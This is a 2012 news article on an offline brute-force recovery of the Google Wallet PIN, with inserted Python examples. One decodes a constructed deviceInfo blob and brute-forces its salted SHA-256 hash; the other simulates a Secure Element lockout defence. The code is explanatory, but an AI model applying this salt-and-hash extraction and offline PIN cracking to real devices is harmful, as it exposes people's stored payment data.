Google addressed the issue, but now the ball is in the banks' court

Feb 9, 2012 11:48 GMT  ·  By

After viaForensics identified several weaknesses in Google Wallet that could be used by criminals to mount social engineering attacks aimed at obtaining sensitive information, zvelo researchers found a more serious issue: the application's PIN can be recovered by an offline brute-force attack.

Not only did the researchers confirm the findings of viaForensics, they also found a way to recover the 4-digit PIN that users enter to authenticate and gain access to the Secure Element (SE), the tamper-resistant chip that stores and encrypts the most sensitive data.

This PIN is an extra security measure specific to Near-Field Communication (NFC) payment systems, one that has no counterpart in a traditional physical credit card. It is meant to lock Google Wallet after a few failed attempts, so that the stored credit card information stays protected.

After poking around in the Wallet's database, the researchers came across a table named metadata containing a row identified as deviceInfo. Once they realized the data was serialized with Google's own Protocol Buffers, they wrote a custom .proto file and used it to decode the binary contents.

Among other items, such as the Unique User ID, Google account information, Cloud to Device Messaging account information and Google Wallet setup status, they found a PIN information section containing a long-integer salt and a SHA-256 hash encoded as a hex string.

Because the PIN is only four digits, there are at most 10,000 candidates to hash, so the researchers recovered the access code easily by brute force. The key point is that this brute force runs entirely offline against the copied salt and hash, so the Wallet's lockout counter is never touched: the recovered PIN can then be entered correctly on the first try, giving access to the most sensitive data stored in Google Wallet.
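The attack path described above, as an added example that is not zvelo's or Google's code: a constructed Protocol Buffers blob standing in for the deviceInfo row is decoded by hand from the wire format, the salt and hex hash are pulled out, and all 10,000 PINs are tried offline. The field numbers (1 = salt, 2 = hash) and the hash input, SHA-256 over the decimal salt followed by the PIN, are assumptions made for this example; the real layout was recovered by zvelo with their own .proto file.

```python
import hashlib

# ---- Constructed sample data (assumptions for this example, not real Wallet data) ----
SAMPLE_SALT = 0x1F3A5C7E9B2D4F60   # constructed 63-bit "long" salt
SAMPLE_PIN = "7391"                # the PIN the attacker does not yet know

def pin_hash(salt, pin):
    # Assumed hash input: decimal salt string concatenated with the 4-digit PIN.
    return hashlib.sha256((str(salt) + pin).encode()).hexdigest()

def encode_varint(n):
    # Protocol Buffers base-128 varint (little-endian groups of 7 bits).
    out = bytearray()
    while True:
        b = n & 0x7F
        n >>= 7
        if n:
            out.append(b | 0x80)
        else:
            out.append(b)
            return bytes(out)

def build_deviceinfo(salt, pin):
    # Assumed layout: field 1 varint (salt), field 2 length-delimited (hex hash).
    h = pin_hash(salt, pin).encode()
    return (bytes([0x08]) + encode_varint(salt)          # key 0x08 = field 1, wire type 0
            + bytes([0x12]) + encode_varint(len(h)) + h)  # key 0x12 = field 2, wire type 2

SAMPLE_BLOB = build_deviceinfo(SAMPLE_SALT, SAMPLE_PIN)

# ---- Attacker side: decode the blob and brute-force the PIN offline ----
def decode_varint(buf, i):
    shift, result = 0, 0
    while True:
        b = buf[i]
        i += 1
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            return result, i
        shift += 7

def parse_deviceinfo(buf):
    # Minimal wire-format walker: enough for varint and length-delimited fields.
    fields, i = {}, 0
    while i < len(buf):
        key, i = decode_varint(buf, i)
        field, wtype = key >> 3, key & 7
        if wtype == 0:
            val, i = decode_varint(buf, i)
        elif wtype == 2:
            ln, i = decode_varint(buf, i)
            val, i = buf[i:i + ln], i + ln
        else:
            raise ValueError("unsupported wire type %d" % wtype)
        fields[field] = val
    return fields

def brute_force_pin(salt, target_hex):
    # At most 10,000 SHA-256 computations; nothing here touches the device's
    # lockout counter, because the comparison happens on the attacker's machine.
    for n in range(10000):
        pin = "%04d" % n
        if pin_hash(salt, pin) == target_hex:
            return pin, n + 1
    return None, 10000

def recover_from_blob(blob):
    f = parse_deviceinfo(blob)
    return brute_force_pin(f[1], f[2].decode())

if __name__ == "__main__":
    pin, hashes = recover_from_blob(SAMPLE_BLOB)
    print("PIN %s recovered after %d hashes" % (pin, hashes))
```

Swapping SHA-256 for a slow KDF would not rescue this design: 10,000 candidates stay 10,000 candidates, and a few seconds per guess is still minutes for the whole keyspace. Whatever the hash, a verifier that can be copied off the device is a verifier the lockout counter cannot protect.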

Google moved quickly to address the issue but ran into obstacles. The main impediment is that a proper fix requires updating the code that runs on the SE, and any such update has to be approved and signed by the SE manufacturers.

Solving the problem properly means moving PIN verification into the SE itself, which would make the banks responsible for protecting the PIN.
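Why moving verification into the SE matters, as an added example (a simulated design, not Google's or any SE vendor's actual applet): the salt and digest live only inside the verifier, the only operation exposed is "is this PIN correct?", and a retry counter locks the verifier after a handful of wrong answers. The same 10,000-candidate search that succeeds offline now gets five attempts before it is shut out. The retry limit of five and the internal hashing scheme are assumptions for this example.

```python
import hashlib
import hmac
import os

class SecureElementPinVerifier:
    """Simulated SE applet. The salt and digest are never exported; callers
    can only submit a candidate PIN and learn yes/no. (Assumed design.)"""
    MAX_TRIES = 5  # assumed retry limit

    def __init__(self, pin):
        self._salt = os.urandom(16)
        self._digest = hashlib.sha256(self._salt + pin.encode()).digest()
        self._tries_left = self.MAX_TRIES
        self.locked = False

    def verify(self, pin):
        # Refuse everything once locked: no oracle remains for the attacker.
        if self.locked:
            return False
        candidate = hashlib.sha256(self._salt + pin.encode()).digest()
        if hmac.compare_digest(candidate, self._digest):
            self._tries_left = self.MAX_TRIES   # success resets the counter
            return True
        self._tries_left -= 1
        if self._tries_left == 0:
            self.locked = True
        return False

    def tries_left(self):
        return self._tries_left

def online_brute_force(se):
    """Attacker who can only talk to the SE: no salt or hash to copy, so every
    guess has to go through verify() and is counted against the retry limit."""
    for n in range(10000):
        if se.locked:
            return None, n           # stopped after n counted attempts
        pin = "%04d" % n
        if se.verify(pin):
            return pin, n + 1
    return None, 10000

if __name__ == "__main__":
    se = SecureElementPinVerifier("7391")
    print(online_brute_force(se), "locked =", se.locked)
```

The contrast with the application-side design is the location of the comparison, not the strength of the hash: the counter only helps when the attacker has no way to check guesses except through the component that enforces it.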

“At present, the decision is in the banks’ hands. They may actually choose to accept the risk imposed by this vulnerability rather than incur the financial and administrative overhead of allowing Google to release a proper fix (and thereby potentially put the banks on the hook for the PIN security),” zvelo’s Joshua Rubin said.

In the meantime, users can reduce their exposure by not rooting their phones (the Wallet database sits in the application's private storage, so reading it requires root access), enabling the lock screen, disabling USB debugging and keeping the device up to date.

Check out the PoC video provided by zvelo: